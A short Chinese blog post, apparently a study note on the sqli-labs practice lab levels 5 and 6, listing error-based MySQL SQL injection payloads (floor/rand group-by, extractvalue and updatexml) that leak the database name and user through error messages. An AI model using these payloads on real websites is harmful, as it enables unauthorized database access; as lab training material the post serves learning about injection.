sqli-lab less-5、6 Double Query

利用报错注入,mysql5.6以上有三种
第一种 利用floor构造重复键group by报错
输出字符长度限制为64个字符

?id=1' and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

第二种 updatexml和extractvalue 基于 ~ 符号报错
注意的是这种最多能报32位长度,如果有更多位数请使用字符串截取函数

?id=1' and (extractvalue(1,concat(0x7e,(select user()),0x7e))) --+
?id=1' and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) --+
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • Sqli-Labs:Less17*
    基于错误_POST_更新查询注入 我讨厌这个错误回显。 这一关有很多不同的解法,我们将依次分析(这篇看上去会很长)...
    Hyafinthus阅读 4,068评论 7 12
  • sql注入简单总结
    最近两周刷了一下sqli-labs,对sql注入有了一个基本的认识。这里写个总结。 1.sql注入原理简单介绍在一...
    jun123123阅读 1,352评论 1 3
  • 关于sql盲注的一些总结
    普通的sql注入大致可以通过在提交框中输入单引号、双引号和括号等看网页的返回内容来判断,但有很多网站并不会将一些敏...
    浅笑清欢阅读 2,171评论 2 4
  • sqli-labs(lesson1-lesson22)
    lesson1: 插入单引号报错 id被单引号包裹,确认字段数 ?id=1' order by 3--+ 字段为3...
    A_XiaoBiao阅读 864评论 0 5
  • 飞鸟集每日一品(8)
    昨天只记得发微信公众号了,sorry~以下是正文: (8) 泰戈尔原文: Her wistful face hau...
    语熙阅读 1,088评论 0 0